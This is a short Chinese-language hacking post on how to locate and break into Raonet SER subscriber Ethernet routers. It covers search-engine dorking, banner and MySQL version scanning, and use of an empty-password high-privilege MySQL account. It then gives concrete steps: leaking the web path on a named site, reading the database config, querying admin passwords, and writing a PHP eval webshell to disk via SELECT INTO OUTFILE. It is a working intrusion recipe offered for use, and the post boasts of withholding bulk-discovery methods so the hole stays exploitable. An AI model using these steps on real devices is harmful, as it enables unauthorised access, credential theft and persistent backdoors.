寻找存在漏洞的路由器方法: 1:google搜索'Raonet Subscriber Ethernet Router' 2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001 3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
入侵步骤: 1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php 2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
3:得到密码后连接,查看GUI管理密码:
use ser_500
select id,passwd from user;
4:通过数据库写入webshell,执行命令:
use mysql;
create table ok(cmd TEXT);
insert into ok values("<?php @eval($_POST[cmd])?>");
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
drop table ok;
5:连接后门shell.php 6. 搞定! 漏洞证明: |